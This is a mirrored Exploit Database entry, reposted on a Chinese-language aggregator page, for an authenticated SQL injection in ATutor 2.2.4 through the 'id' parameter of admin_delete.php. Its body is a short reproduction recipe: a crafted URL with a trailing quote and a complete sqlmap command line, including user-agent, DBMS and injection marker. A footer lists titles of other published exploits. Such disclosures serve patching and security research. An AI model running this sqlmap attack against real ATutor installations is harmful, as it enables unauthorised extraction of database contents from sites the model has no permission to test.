ATutor 2.2.4 – ‘id’ SQL Injection

Exploit Database
51 阅读

作者： Andrey Stoykov

日期： 2020-02-24
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48117/

# Exploit Title: ATutor 2.2.4 - 'id' SQL Injection
# Date: 2020-02-23
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://atutor.github.io/
# Software Link: https://sourceforge.net/projects/atutor/files/latest/download
# Version: ATutor 2.2.4
# Tested on: LAMP on Ubuntu 18.04

Steps to Reproduce:

1) Login as admin user
2) Browse to the following URL:
http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17' 
3) Exploiting with SQLMAP:
//Must supply valid User-Agent otherwise, there will be errors.
sqlmap --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --dbms=mysql -u "http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17*" --cookie=<COOKIES HERE>

last Exploits
ATutor 2.2.4 – ‘id’ SQL Injection的更多信息

memcache-viewer – Cross-Site Scripting：
xEpan 1.0.1 – Cross-Site Request Forgery：
Zephyrus CMS – ‘index.php’ SQL Injection：
Social Microblogging PRO 1.5 – Persistent Cross-Site Scripting：
Collectric CMU 1.0 – ‘lang’ Hard-Coded Credentials / SQL injection：
Voyager 1.3.0 – Directory Traversal：
Task Management System 1.0 – Unrestricted File Upload to Remote Code Execution：
Ametys CMS 4.0.2 – Password Reset：